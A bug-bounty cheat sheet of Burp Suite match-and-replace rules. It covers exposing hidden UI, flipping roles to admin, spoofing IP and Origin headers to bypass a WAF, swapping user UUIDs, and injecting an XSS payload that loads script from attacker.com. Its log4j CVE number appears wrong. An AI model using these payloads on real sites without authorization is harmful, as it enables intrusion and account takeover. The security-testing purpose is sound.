Useful Match and Replace BurpSuite Rules
Finding hidden buttons, forms, and other UI elements
Many websites contain hidden buttons, forms, and other UI elements like
<div aria-hidden="true"></div>
<div style="visibility: hidden;"></div>
<div style="display: none;"></div>
<script>document.getElementbyTagName("test").hidden=true</script>
<button type="button" disabled>test</button>
- Show Hidden UI (1)
- Show Hidden UI (2)
- Change disable to enable
Sometimes we can get hidden features by changing from false
to true
. The example:
- Changing role from normal user to admin
- Make email verified
Bypassing WAF by adding some headers
- Adding
X-Forwarded-Host: 127.0.0.1
Create another rule but change the header to:
X-Forwarded-Port: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-Scheme: 127.0.0.1
X-Frame-Options: Allow
X-Forwarded-For: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Cluster-Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
Origin: null
Origin: Domain.attacker.com
By changing original user UUID to another UUID
Create another rule but change the
type
to "Request First Line"
By adding some XSS payload into the request
- Finding XSS on
User-Agent
- Finding XSS on
Referer
- Auto replace user input with XSS payload
So by just inputting the words
xss_payload
on the website it will be immediately replaced with"><script src=https://attacker.com></script>
Change the XSS payload as you want
Some random match and replace rules
- Finding CVE-2021-44221
Create some another rules to look for them in headers, parameters and more. Because log4j can be found anywhere
- Help companies to identify your traffic and separate them from malicious traffic by adding a custom header
References:
- https://twitter.com/PTestical/status/1413497660133318659
- https://twitter.com/HolyBugx/status/1355472991061213184
- https://twitter.com/intigriti/status/1192103070072741894
- https://twitter.com/payloadartist/status/1469582893772984322
- https://twitter.com/payloadartist/status/1422247377516122114
- https://twitter.com/hackerscrolls/status/1247177578269597698
Soon will be updated again